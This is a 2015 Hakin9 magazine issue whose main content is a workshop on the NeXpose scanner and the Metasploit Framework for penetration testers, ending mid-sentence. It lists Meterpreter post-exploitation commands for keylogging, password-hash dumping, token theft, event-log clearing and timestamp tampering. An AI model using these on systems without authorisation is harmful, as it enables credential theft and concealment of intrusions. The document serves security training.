Hakin9 - ISO Interactive

Cyber Security Auditing Software
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
The network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
NeXpose and Metasploit Pro Hacking
Copyright © 2015 Hakin9 Media Sp. z o.o. SK
Table of Contents
07 NeXpose and Metasploit Pro Hacking, by Raheel Ahmad
11 Metasploit Pro Professional Use, by Raheel Ahmad
21 NeXpose and Metasploit Lab, by Raheel Ahmad
31 Hacking with NeXpose and Metasploit, by Raheel Ahmad
49 Basecamp – Project Management for the Sane, by Troy Hipolito
74 Tackling SYN Flood attacks, by Ratan Jyoti
80 Implementation of Transparent Data Encryption (TDE) and Additional Compensational Controls as Alternative Method Regarding Encryption of PAN Numbers in Microsoft SQL Database (PCI DSS v3.0, Section 3.4), by Darko Mihajlovski, Kiril Buhov, Jani Nikolov
86 Hacking Journalists, by Bob Monroe
88 Offended by Offensive Security, by Bob Monroe
90 Shouting at the Security Waves, by Bob Monroe
92 RGB LED Lighting Shield with XMC1202 for Arduino, by Bob Monroe
94 Security in Computing by Charles P. Pfleeger, Shari Lawrence Pfleeger and Jonathan Margulies, by Bob Monroe
Dear Readers,
This new issue of Hakin9 Magazine is coming out today. I hope that my words find you
well and in a happy mood. I hope that you will find many interesting articles inside the
magazine and that you will have time to read all of them. All comments are welcome.
We collected the articles written by experts in their field to provide you with the highest-quality
knowledge. Enjoy your reading and develop your new skills with our magazine!
Inside this Hakin9 issue, we publish articles that will present security knowledge. If you
want to find out more about penetration testing, you should read them all. We would like to
highlight the articles on Nexpose and Metasploit.
Also, we recommend that you read Darko Mihajlovski’s article. “Proper” TDE
implementation should cover requirement 3.4 of PCI DSS v3, which demands the
following: Render PAN unreadable anywhere it is stored (including on portable digital media,
backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures.
Of course, please do not forget to read the other articles. I would like to mention that as long
as we have our precious readers, we have a purpose. We owe you a huge THANK YOU. We
are grateful for every comment and opinion, either positive or negative. Every word from you
lets us improve Hakin9 magazine and brings us closer to the ideal shape of our publication.
Thank you.
Ewa & Hakin9 team
Editor in Chief: Ewa Dudzic
Editorial Advisory Board: David Kosorok, Matias N.
Sliafertas, Gyndine, Gilles Lami, Amit Chugh, Sandesh Kumar,
Trish Hullings
Special thanks to our Beta testers and Proofreaders who helped
us with this issue. Our magazine would not exist without your
assistance and expertise.
Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Art. Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media sp. z o.o. SK
02-676 Warszawa, ul. Postępu 17D
NIP 95123253396
www.hakin9.org/en
Whilst every effort has been made to ensure the highest quality
of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the content’s usage.
All trademarks presented in the magazine were used for
informative purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our magazine may be used
in private, local networks only. The editors hold no
responsibility for the misuse of the techniques presented
or any data loss.
[ GEEKED AT BIRTH ]
You can talk the talk.
Can you walk the walk?
[ IT’S IN YOUR DNA ]
LEARN:
Advancing Computer Science
Artificial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
www.uat.edu > 877.UAT.GEEK
Please see www.uat.edu/fastfacts for the latest information about
degree program performance, placement and costs.
NeXpose and Metasploit Pro Hacking
by Raheel Ahmad
Welcome to the “NeXpose and Metasploit Pro Hacking” Workshop. In this workshop, you
will learn more about NeXpose and Metasploit features, their usage and how you can best
utilize these tools in order to perform penetration testing or security assessment of your
organization.
You will learn more about NeXpose, one of the best vulnerability assessment and management products on the
market. In security testing and penetration testing, vulnerability assessment plays an important role in
successfully penetrating a network or system, and carrying it out well requires a cutting-edge vulnerability
assessment tool with which to assess the security of the target network.
NeXpose isn’t the only tool on the market for vulnerability assessment; however, it is one of the best among
the industry-leading tools in this area.
Vulnerability assessment leads into the exploitation phase of the ethical hacking or penetration testing
lifecycle, and NeXpose gives you an edge here by showing how a discovered vulnerability can be exploited.
Industry Comments: http://www.scmagazine.com/rapid7-nexpose-v55/review/3796/.
Like any other security product, NeXpose has certain installation requirements, and you should know them
in detail to get the most out of this tool.
NeXpose Installation Requirements
Minimum Hardware
• 2 GHz+ processor
• 8 GB RAM (64 bit)
• 80 GB+ available disk space (10 GB for Community Edition)
• 10 GB+ available disk space for Scan engines
• English operating system with English/United States regional settings
• 100 Mbps network interface card
Operating Systems
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x
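As an added illustration (not part of the article or of NeXpose), the following Python script encodes the minimum requirements above as a preflight check. The figures are read as lower bounds; the live probe reads /proc on Linux and assumes NeXpose's default install directory /opt/rapid7/nexpose (an assumption), while the check function itself takes plain values so it can be exercised with constructed inputs.

```python
"""Preflight check against the NeXpose minimum requirements listed above.

Added example, not NeXpose or Rapid7 code. The thresholds are the figures from
the requirements list, read as lower bounds; the live probe is Linux-only
(/proc) and assumes the default install path /opt/rapid7/nexpose.
"""
import os
import platform
import shutil

MIN_CPU_GHZ = 2.0
MIN_RAM_GB = 8.0
MIN_DISK_GB = 80.0            # full editions
MIN_DISK_GB_COMMUNITY = 10.0  # Community Edition
MIN_NIC_MBPS = 100
SUPPORTED_ARCH = {"x86_64", "amd64"}   # 64-bit only
REQUIRED_LOCALE = "en_us"              # English / United States regional settings
DEFAULT_INSTALL_DIR = "/opt/rapid7/nexpose"  # assumed default; adjust if needed


def check_requirements(cpu_ghz, ram_gb, disk_gb, arch, lang,
                       community=False, nic_mbps=None):
    """Return a list of failure messages; an empty list means every check passed.

    cpu_ghz or nic_mbps may be None when the host cannot report them; those
    checks are then skipped rather than failed.
    """
    failures = []
    if cpu_ghz is not None and cpu_ghz < MIN_CPU_GHZ:
        failures.append("CPU %.2f GHz < %.1f GHz" % (cpu_ghz, MIN_CPU_GHZ))
    if ram_gb < MIN_RAM_GB:
        failures.append("RAM %.1f GB < %.0f GB" % (ram_gb, MIN_RAM_GB))
    need_disk = MIN_DISK_GB_COMMUNITY if community else MIN_DISK_GB
    if disk_gb < need_disk:
        failures.append("free disk %.1f GB < %.0f GB" % (disk_gb, need_disk))
    if arch.lower() not in SUPPORTED_ARCH:
        failures.append("architecture %r is not 64-bit x86" % arch)
    # LANG looks like "en_US.UTF-8": keep only the language_REGION part.
    if lang.split(".")[0].replace("-", "_").lower() != REQUIRED_LOCALE:
        failures.append("locale %r is not en_US" % lang)
    if nic_mbps is not None and nic_mbps < MIN_NIC_MBPS:
        failures.append("NIC %d Mbps < %d Mbps" % (nic_mbps, MIN_NIC_MBPS))
    return failures


def parse_meminfo(text):
    """Extract MemTotal (kB) from /proc/meminfo text and return gigabytes."""
    for line in text.splitlines():
        if line.startswith("MemTotal:"):
            return int(line.split()[1]) / (1024.0 ** 2)
    raise ValueError("MemTotal not found in meminfo")


def parse_cpu_ghz(text):
    """Return the highest 'cpu MHz' reported in /proc/cpuinfo, in GHz, or None."""
    values = [float(line.split(":", 1)[1]) for line in text.splitlines()
              if line.startswith("cpu MHz")]
    return max(values) / 1000.0 if values else None


def probe_local(install_dir=DEFAULT_INSTALL_DIR, community=False):
    """Gather the values from this Linux host and run the checks on them."""
    with open("/proc/meminfo") as f:
        ram_gb = parse_meminfo(f.read())
    with open("/proc/cpuinfo") as f:
        cpu_ghz = parse_cpu_ghz(f.read())
    # Walk up until an existing directory is found, so the free-space figure
    # is for the filesystem the installer would actually write to.
    path = install_dir
    while not os.path.isdir(path):
        path = os.path.dirname(path) or "/"
    disk_gb = shutil.disk_usage(path).free / (1024.0 ** 3)
    return check_requirements(cpu_ghz, ram_gb, disk_gb, platform.machine(),
                              os.environ.get("LANG", ""), community)


if __name__ == "__main__":
    problems = probe_local()
    print("OK: host meets the NeXpose minimums" if not problems
          else "NOT OK:\n  " + "\n  ".join(problems))
```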
NeXpose Editions
NeXpose comes in several editions, with flexibility and capabilities ranging from the individual user up to
the Ultimate edition, as shown in the figure below.
Details on all of these editions are available on the Rapid7 product page:
http://www.rapid7.com/products/nexpose/editions.jsp. Our workshops will use the Consultant edition in the lab.
Why Use NeXpose?
In the overall penetration testing or ethical hacking lifecycle, “Vulnerability Assessment & Management”
is the phase in which you discover potential vulnerabilities in the targeted network or system. Many tools
are available to automate this process and enable security professionals or administrators to determine
the security posture of their network effectively.
NeXpose helps achieve this goal in several ways and provides support for performing an in-depth
vulnerability assessment. This tool is better than the other vulnerability assessment tools on the market.
The best part is that, for each discovered vulnerability, it lists the exploits available on exploit-db and in
the Metasploit Framework and creates files in the same format as Metasploit modules, which you can use
to configure Metasploit for exploitation. This tight compatibility with the Metasploit Framework gives
NeXpose another edge in the industry and an advantage for security testers.
NeXpose is also available as a standalone virtual appliance that you can deploy separately among your
virtual servers, and the split between the scan engine and the security console gives it another edge in
performance and reliability. You will explore the tool’s features further in the workshop, together with
a complete walkthrough of its usage.
NeXpose Components
The NeXpose architecture is split into two main components: a central server and one or more scan
engines. The central server is called the NSC (NeXpose Security Console) and the scan engine is called
the NSE (NeXpose Scan Engine). The main purpose of the central server is to run a web server process
that provides access to its users, connect to a backend database for information storage, and drive a scan
engine that scans assets.
Additional scan engines can be placed at other points in the network to originate scans under the control
of the NSC. This is a distributed architecture, with scan engines and the console communicating over
a secure connection.
A NeXpose Security Console (NSC) performs the following operations:
• It communicates with Scan Engines to start scans, retrieve scan information, and store scan data.
• It provides a Web interface for managing all NeXpose operations.
• It downloads product and content updates from the Rapid7 update server.
• The Security Console Appliance also includes a local Scan Engine.
A NeXpose Scan Engine (NSE) appliance performs asset discovery, vulnerability detection, and policy
compliance testing; it is controlled by a Security Console.
Vulnerability Assessment & NeXpose
With so many vulnerability assessment tools competing in the industry today, one of the biggest challenges
for any vulnerability management program is the analysis of scan results. If you want verifiable and
actionable results that can be remediated effectively, you need solutions for the discovered vulnerabilities;
otherwise you can be overwhelmed with false positives, which can undermine the overall vulnerability
assessment process or program.
The NeXpose architectural model described above is designed to solve this problem and to provide the
flexibility to build a simpler vulnerability check model with a higher degree of accuracy. Vulnerability scans
with NeXpose generate real risk analysis, credible remediation plans and easy-to-use data management
functions. This is achieved by extensive vulnerability detection based on proactive scanning of systems
and services; it also covers web applications and databases.
To provide more focused and dedicated scans, NeXpose ships with templates for a number of predefined
scan types and gives you the flexibility to create your own. The existing templates already cover a wide
range of scenarios, including full/normal audit, denial-of-service, penetration testing and database testing.
Moreover, NeXpose can also help you to identify known vulnerabilities along with the configuration
compliance issues for:
• Web sites/services
• Databases
• Network equipment
• Operating systems
• Applications
All this detection happens during the same scan and from the same scan engine, which makes it simpler for
you to configure and to get all the information you need in one pass.
Vulnerability Reporting and NeXpose
For an ethical hacker or professional penetration tester, the main challenge is to report what he or she
has done during the vulnerability assessment and exploitation phases, or throughout the complete ethical
hacking lifecycle. This requires a good presentation of the technical details together with a business-oriented
management summary, so that an ethical hacker can explain what was performed while ethically hacking
the targeted network. When you have finished the vulnerability or compliance scans, you can assess the
risk and determine what is most important for the targeted network environment. NeXpose includes several
reports that help with this, including:
• Prioritized Remediation Report
• Top 10 Vulnerability Report
• Audit Report
These reports cover all available patches and all known vulnerabilities in the targeted network environment
and provide a prioritized list of which remediations will have the most impact on risk in that environment.
NeXpose also offers the flexibility to report on the assets and vulnerabilities that matter in the targeted
network environment by means of rich asset and vulnerability filtering. Such reports can be automated
from the UI or the API, so that as soon as a scan completes, remediation owners get the accurate and
detailed information they need to do their jobs and stakeholders get accurate information on how risk is
changing over time. Report generation is another major factor that makes this tool the best among the
best: it will not disappoint you when accuracy in the generated report matters more than simply dumping
the report contents.
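To make the prioritisation idea concrete, here is an added Python example (not NeXpose's risk model or report code): constructed findings are grouped by the remediation that fixes them, weighted by whether a public exploit exists, and ranked by the risk each remediation removes, in the spirit of the Prioritized Remediation and Top 10 Vulnerability reports. The weights and the sample data are assumptions made for the illustration.

```python
"""Rank remediations by the risk they remove, and vulnerabilities by spread.

Added example, not NeXpose's own risk model or report code: the exploit
weights and the findings below are constructed for the illustration.
"""

# Multiplier applied to CVSS when a public exploit exists (assumed values).
EXPLOIT_WEIGHT = {"metasploit": 1.5, "exploit-db": 1.25, None: 1.0}

# Constructed sample scan output: one row per (asset, vulnerability) pair.
# 'fix' names the remediation that closes the finding.
FINDINGS = [
    {"asset": "10.0.0.5",  "vuln": "vuln-1", "cvss": 10.0, "exploit": "metasploit", "fix": "patch-1"},
    {"asset": "10.0.0.7",  "vuln": "vuln-1", "cvss": 10.0, "exploit": "metasploit", "fix": "patch-1"},
    {"asset": "10.0.0.9",  "vuln": "vuln-2", "cvss": 7.5,  "exploit": "exploit-db", "fix": "patch-2"},
    {"asset": "10.0.0.9",  "vuln": "vuln-3", "cvss": 9.8,  "exploit": None,         "fix": "patch-3"},
    {"asset": "10.0.0.11", "vuln": "vuln-4", "cvss": 4.3,  "exploit": None,         "fix": "config-1"},
    {"asset": "10.0.0.5",  "vuln": "vuln-4", "cvss": 4.3,  "exploit": None,         "fix": "config-1"},
    {"asset": "10.0.0.11", "vuln": "vuln-2", "cvss": 7.5,  "exploit": "exploit-db", "fix": "patch-2"},
]


def finding_risk(finding):
    """Risk contributed by one finding: CVSS scaled by exploit availability."""
    return finding["cvss"] * EXPLOIT_WEIGHT.get(finding["exploit"], 1.0)


def prioritize_remediations(findings, top=10):
    """Group findings by remediation and rank by total risk removed.

    Returns dicts with the remediation, its risk, affected assets and
    vulnerabilities, and the cumulative share of total risk covered so far.
    """
    groups = {}
    for f in findings:
        g = groups.setdefault(f["fix"], {"fix": f["fix"], "risk": 0.0,
                                         "assets": set(), "vulns": set()})
        g["risk"] += finding_risk(f)
        g["assets"].add(f["asset"])
        g["vulns"].add(f["vuln"])
    ranked = sorted(groups.values(), key=lambda g: (-g["risk"], g["fix"]))
    total = sum(g["risk"] for g in ranked)
    report, cumulative = [], 0.0
    for g in ranked[:top]:
        cumulative += g["risk"]
        report.append({
            "fix": g["fix"],
            "risk": round(g["risk"], 2),
            "assets": sorted(g["assets"]),
            "vulns": sorted(g["vulns"]),
            "cumulative_pct": round(100.0 * cumulative / total, 1) if total else 0.0,
        })
    return report


def top_vulnerabilities(findings, top=10):
    """Top-N vulnerabilities by number of affected assets, then by risk."""
    by_vuln = {}
    for f in findings:
        v = by_vuln.setdefault(f["vuln"], {"vuln": f["vuln"], "assets": set(), "risk": 0.0})
        v["assets"].add(f["asset"])
        v["risk"] += finding_risk(f)
    ranked = sorted(by_vuln.values(),
                    key=lambda v: (-len(v["assets"]), -v["risk"], v["vuln"]))
    return [{"vuln": v["vuln"], "asset_count": len(v["assets"]),
             "risk": round(v["risk"], 2)} for v in ranked[:top]]


if __name__ == "__main__":
    for row in prioritize_remediations(FINDINGS):
        print("%-9s risk=%6.2f assets=%d cumulative=%5.1f%%" % (
            row["fix"], row["risk"], len(row["assets"]), row["cumulative_pct"]))
    for row in top_vulnerabilities(FINDINGS):
        print("%-7s on %d asset(s), risk=%.2f" % (row["vuln"], row["asset_count"], row["risk"]))
```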
In summary, NeXpose provides detailed and in-depth vulnerability assessment and management, along with
a head start on the exploitation phase of penetration testing or ethical hacking. Detailed hands-on skills
with it are recommended if you want to stand out from others in the penetration testing field.
We hope this has been informative for you, and thank you for completing the article. The next article
covers Metasploit in depth, and later we will explore how to use NeXpose and Metasploit together to
perform an extensive security assessment.
About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT
Founder of 26Securelabs, an information security consulting company. Raheel is an expert in information
security with 9+ years in the domain of infosec.
Metasploit Pro Professional Use
by Raheel Ahmad
You will study the Metasploit Framework in depth. This will also help you understand the extraordinary
benefits of this security tool, which also plays a key role in the exploit development lifecycle. Metasploit
is the bread and butter of many information security professionals and pen testers.
Metasploit Framework – The Hacker’s Bread
There are a couple of good exploitation tools on the market that are used by security professionals;
however, Metasploit leads the industry for a couple of reasons. Other tools, like Core Impact and Immunity
Canvas, lead the market alongside Metasploit, but they are closed source and no free or open version of
them is available from any legitimate source. Metasploit comes in a community edition, which has no major
differences in features compared with the pro version of Metasploit.
Many freelancers and small companies in security consulting use this community edition of Metasploit, and
it is also used by many professionals who practice hacking in order to advance their hacking skills and
exploitation techniques. I personally have used Metasploit from its early days and still make good use of
this framework when I need to perform exploit research and testing in my lab.
Metasploit Architecture’s Basics
The Metasploit Framework is modular. The most fundamental piece of the architecture is the Rex library,
short for Ruby Extension Library. The framework itself is layered on top of it: the lowest level is the core
library, followed by the base library; finally, the base library is extended by the framework UI, which
implements support for the different types of user interfaces to the framework, such as the command line
and the web interface. Separate from the framework itself are the modules and plugins that it is designed
to support. Metasploit Framework fundamentals include [msfcli], [msfconsole], [exploits], [payloads], the
[database] and the famous [meterpreter].
Metasploit is not just an exploitation tool; it has many features that help you with exploit research and
development. You can also develop your own Metasploit modules and add the flexibility you need for
dedicated pen testing projects. The fundamentals listed above are just the tools used by someone who
treats Metasploit as a click-and-go tool for pen testing or ethical hacking.
This tool is superbly developed, helps in many different ways and is widely used by information security
professionals. This article highlights as much as possible, although the tool really requires a complete
workshop if you want to understand it and master it. Nevertheless, you will learn the professional usage
of this great tool in pen testing.
Metasploit Commands to Memorize
If you want to learn Metasploit and use it in your pen testing projects or for any security research and exploit
development, then there are some core commands you should understand and have hands-on experience with.
General Commands
? – help menu
background – moves the current session to the background
bgkill – kills a background meterpreter script
bglist – provides a list of all running background scripts
bgrun – runs a script as a background thread
channel – displays active channels
close – closes a channel
exit – terminates a meterpreter session
help – help menu
interact – interacts with a channel
irb – go into Ruby scripting mode
migrate – moves the active process to a designated PID
quit – terminates the meterpreter session
read – reads the data from a channel
run – executes the meterpreter script designated after it
use – loads a meterpreter extension
write – writes data to a channel
File System Commands
cat – read and output to stdout the contents of a file
cd – change directory on the victim
del – delete a file on the victim
download – download a file from the victim system to the attacker system
edit – edit a file with vim
getlwd – print the local directory
getwd – print working directory
lcd – change local directory
lpwd – print local directory
ls – list files in current directory
mkdir – make a directory on the victim system
pwd – print working directory
rm – delete a file
rmdir – remove directory on the victim system
upload – upload a file from the attacker system to the victim
Networking Commands
ipconfig – displays network interfaces with key information including IP address, etc.
portfwd – forwards a port on the victim system to a remote service
route – view or modify the victim routing table
System Commands
clearav – clears the event logs on the victim’s computer
drop_token – drops a stolen token
execute – executes a command
getpid – gets the current process ID (PID)
getprivs – gets as many privileges as possible
getuid – get the user that the server is running as
kill – terminate the process designated by the PID
ps – list running processes
reboot – reboots the victim computer
reg – interact with the victim’s registry
rev2self – calls RevertToSelf() on the victim machine
shell – opens a command shell on the victim machine
shutdown – shuts down the victim’s computer
steal_token – attempts to steal the token of a specified (PID) process
sysinfo – gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops – lists all accessible desktops
getdesktop – get the current meterpreter desktop
idletime – checks how long the victim system has been idle
keyscan_dump – dumps the contents of the software keylogger
keyscan_start – starts the software keylogger when associated with a process such as Word or browser
keyscan_stop – stops the software keylogger
screenshot – grabs a screenshot of the meterpreter desktop
set_desktop – changes the meterpreter desktop
uictl – enables control of some of the user interface components
Privilege Escalation & Password Dump & Timestomp Commands
getsystem – uses 15 built-in methods to gain sysadmin privileges
hashdump – grabs the hashes in the password (SAM) file
timestomp – manipulates the modify, access, and create attributes of a file
Metasploit Professional Use
The Metasploit Framework has been in the industry for a while now and is the first choice of security
professionals when you talk about pen testing. However, not all security professionals have hands-on
experience with Metasploit; they just use it as a tool with a large stock of exploits that anyone can launch.
This is not the professional usage of Metasploit. If you, as a security professional, want to stand out from
such professionals, then become an expert in using this great tool.
To reach expert level with Metasploit, you should develop the following skills with this wonderful tool:
• Understanding how the tool works
• Modules Information
• Exploiting and Pivoting
• Customization of Modules
• Developing a Metasploit Module
• Exploit Development with Metasploit
A couple of these skills will be covered in this module and the remaining will be explored in the last module
with hands-on testing in the workshop. Keep learning with hakin9!
Metasploit Usage
The commands presented above cover only some basics of the command line usage of this tool; you will be
able to explore more in the pro version of Metasploit. However, let’s quickly review what else you can do
from the command line. The functionality available there is described below, with usage details.
Command Line Access
Type help and you will see core commands, some of them are shown below:
Other commands you can see are related to database functionality, as shown in the snapshot below.
You can also load the different modules available in the Metasploit Framework, which integrate with other
security tools for advanced usage and, essentially, for performing pen testing professionally from the single
command line platform of the Metasploit Framework. All the modules available by default when the
Metasploit Framework runs can be found in its module directory. Its location varies with the installation
directory and the operating system on which you have installed the Metasploit Framework.
On Kali Linux, you can find these modules at the path shown in the snapshot below.
There are, however, further modules that you can add at run time. These are shown below; each of them is
loaded into the run time environment with the “load” command. You should practice loading these modules
and using them one by one. Usage details are also available from the command line and are presented
shortly.
Loading Nessus Modules on Run Time
Loading NeXpose Module on Run Time
Loading other Modules on Run Time
Loading Famous “wmap” & “sqlmap” Modules on Run Time
Once all of these modules are loaded, you will be able to see the commands, or let’s say the functionality,
that each module provides: for example, running vulnerability scans directly from the Metasploit Framework
through the Nessus and NeXpose modules just loaded, or running web application assessments with the
“sqlmap” and “wmap” modules, and similarly for the other modules we have just loaded.
The following snapshots show the functionality available after loading these modules.
Nessus features available after loading its module:
Similarly, NeXpose features are available after its module is loaded.
After loading all of these modules, let’s look at what you will be able to do from the Metasploit command
line interface:
• Nessus Vulnerability Scans
• NeXpose Vulnerability Scans
• Web Scans with “wmap”
• Database testing with “sqlmap”
• Exploitation
This is what is called a full-fledged pen testing platform, one that gives you the flexibility to run multiple
tasks from a single place. This is the power of Metasploit, and you can also develop your own module and
import it into the Metasploit Framework. You will explore all of these features in the upcoming modules,
where you will perform hands-on testing with them and develop your skills with the Metasploit Framework.
But that is not enough at this stage: you still need to explore the exploit development features of Metasploit
mentioned earlier in this module. They will be covered in the last module. In our opinion, Metasploit is used
most efficiently from the command line and, as a security professional, you should be an expert with the
command line. That is what the industry expects, although it is not a rule! Hackers like the “shell”. Keep
learning with hakin9! We have more for you to learn and hack!
About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT
Founder of 26Securelabs, an information security consulting company. Raheel is an expert in information
security with 9+ years in the domain of infosec.
NeXpose and Metasploit Lab
by Raheel Ahmad
You will learn how to set up one box with multiple core hacking tools that can help you perform ethical
hacking or pen testing. You can customize these tools and get them ready for quick use. However,
suitable hardware is required so that you can run these tools together.
You should be able to download and obtain keys for the editions of NeXpose and Metasploit Framework
other than the community editions; however, if you only have the community versions it doesn’t make much
difference for learning, although it is better to use the professional versions if possible.
Hardware Requirements
The NeXpose hardware requirements were presented in the previous article, and Metasploit doesn’t
require more than what NeXpose needs to run on a standalone machine.
However, do ensure that you meet the recommended requirements if you don’t want hiccups when
performing vulnerability scans on a large pool of addresses or exploitation analysis of different bugs.
The faster your machine, the better the performance and the better the output.
Choosing Operating System Platform
NeXpose and the Metasploit Framework now support multiple operating system platforms on which you can
install these tools; however, security professionals’ preferences, and the performance of the tools, vary
from OS to OS.
Operating Systems Supported by NeXpose
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x
Operating Systems Supported by Metasploit
• Windows Vista, Windows 7, Windows 8.x, Server 2003, Server 2008 and Server 2012 (64 bit
recommended)
• Red Hat Enterprise Linux 5.x, 6.x (x86 and x86_64)
• Ubuntu Linux 10.04, 12.04, 14.04 (x86 and x86_64)
• Kali Linux 1.0 (Metasploit pre-installed; supported on i386 and AMD64 only)
For this workshop, we initially thought of using the Ubuntu platform to run these tools on a single operating
system, but later shifted to Kali Linux, as it comes with a preinstalled version of Metasploit that you only
need to update, so we will only be installing NeXpose as a standalone installation to complete our lab.
Moreover, we will be able to quickly add the different Metasploit modules that we studied in the previous
module. For these reasons our preference went to Kali Linux, and no doubt Kali will support the overall
ethical hacking cycle in ways that other operating systems would lack.
Kali Linux
You need to be good with Kali Linux if you want to become good at hacking, as Kali Linux has become the
de facto standard in ethical hacking and pen testing. You can easily download this OS from the kali.org
website, and you can find out how to set up a virtual machine for Kali Linux in other hakin9 workshops, so
we will not cover that here. However, this module will cover customization of Kali Linux before you move
on to setting up this lab. If you are a student or a freelancer, a virtual environment is the best fit for you;
however, performance is much better if dedicated hardware is used.
Setup Your NeXpose and Metasploit Box
Log in to the Kali Linux console and download NeXpose onto Kali Linux. Once NeXpose is available for
installation, continue with the initial setup needed for Metasploit to run smoothly on your freshly installed
Kali Linux. Follow the guidelines below as shown in the snapshots and on the command line.
Log in to the Kali console and run the following commands, shown in the snapshots below, to set up
Metasploit smoothly.
Configure “postgresql” and “Metasploit” to run as services at boot time, as shown below:
Start the database and the Metasploit service to carry out the first-time configuration, as shown below:
Type the commands to run Metasploit from the command line as shown below. It will take some time to
configure the required database and settings, as shown in the snapshot. Once configuration is complete,
you will see the console as shown below:
Since this is a fresh installation, it is a good idea to update your Metasploit Framework, as shown below,
by simply typing the “msfupdate” command.
Good, you can see that our fresh installation of Kali Linux is now receiving Metasploit updates. After
updating the Metasploit Framework, verify how many exploits, payloads and auxiliary modules it has
downloaded: once the download and upgrade process finishes, you will notice a change in the numbers
of exploits, payloads, etc.
Cool, now you can upgrade to the professional version of Metasploit by launching the “go pro” command
from its console. However, this requires the corresponding license. You can complete
the workshop with the community versions of Metasploit and NeXpose without hiccups.
Setting up Metasploit Console for other functionalities
Now it’s time to slightly tweak your Metasploit copy by enabling plugins; this simply means loading the modules
available in the Metasploit Framework, as explained in the previous module. You should be able to load
all the modules explained there.
You should practice these modules, especially the “Nessus”, “NeXpose”, “wmap”, “sqlmap” and “openvas”
modules, so that you cover all the security tool integrations available in the Metasploit Framework.
Now your Metasploit is ready and running with these security tools integrated, and you can run scans
using all of them and use their scan results to perform exploitation analysis.
Now move on to the NeXpose installation: download it from the Rapid7 website from within Kali Linux,
as shown in the snapshots below in sequence.
Now open a command-line shell and make the installer executable, as shown in the snapshot below, using
the same commands. We took the snapshots while installing it on Kali Linux, as shown below in
sequence.
If everything goes well with your installation, you should be able to install NeXpose successfully on Kali Linux,
as shown in the snapshot below.
After finishing the installation, browse to the link shown in the window above and enter your product license
key to register this fresh copy of your NeXpose installation.
Activate NeXpose
This will take a bit of time, and then NeXpose will initialize. This completes your lab setup, with both
Metasploit and NeXpose in one box on the Kali Linux platform.
We hope this has been informative for you, and thank you for completing the module. In the next module,
you will conduct scans and exploitation to perform hacking with Metasploit and NeXpose.
About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT
Founder of 26Securelabs, an Information Security consulting company. Raheel is an expert in information
security with 9+ years in the domain of infosec.
Hacking with NeXpose and Metasploit
by Raheel Ahmad
So, now you will learn about how to utilize these tools for hacking purposes.
Quick Facts on Hacking Methodology
Hacking methodology really needs a detailed explanation, and for that you need a separate workshop
to shed light on this detailed and very technical topic. However, for your better understanding, this article
will cover the core of the hacking methodology used by hackers, mostly in ethical hacking and/or penetration
testing projects.
Hacking Methodology
The key steps in the hacking methodology are outlined below in sequential order and form the basis
for the core hacking attempts.
Live System Scans
This is basically the information gathering phase, in which you identify the live hosts
in the targeted network of the organization.
How would this be achieved?
Answer: This is achieved by using scanning tools as an active information gathering technique.
You will be using only the Metasploit Framework to complete this phase, as it provides all the required
modules to run from the console alone.
Ports and Services Scanning
The second step is identifying the operating system of the hosts discovered during the previous
step. This is necessary to learn more about each host machine: it could be a network device, a database
server, or a Windows or Linux machine. Once you have discovered the operating system type, the
next step is to find the open ports and the services hosted by these machines.
However, the above two key steps can be performed in parallel by scanning tools.
How would this be achieved?
Answer: This is achieved by means of the scanning tools and modules available in the Metasploit Framework,
or by scanning tools for which you have added modules at run time, as discussed in detail in
previous modules.
Vulnerability Scanning
Vulnerability assessment is the actual phase in which you discover potential vulnerabilities in the
network. There are many tools available to automate this process. But, ideally, you cannot jump directly
to discovering vulnerabilities.
How would this be achieved?
Answer: This is achieved with tools like NeXpose, Nessus and many more available on the market.
Metasploit plays a key role here as well, once you have enabled the Metasploit Framework to use NeXpose
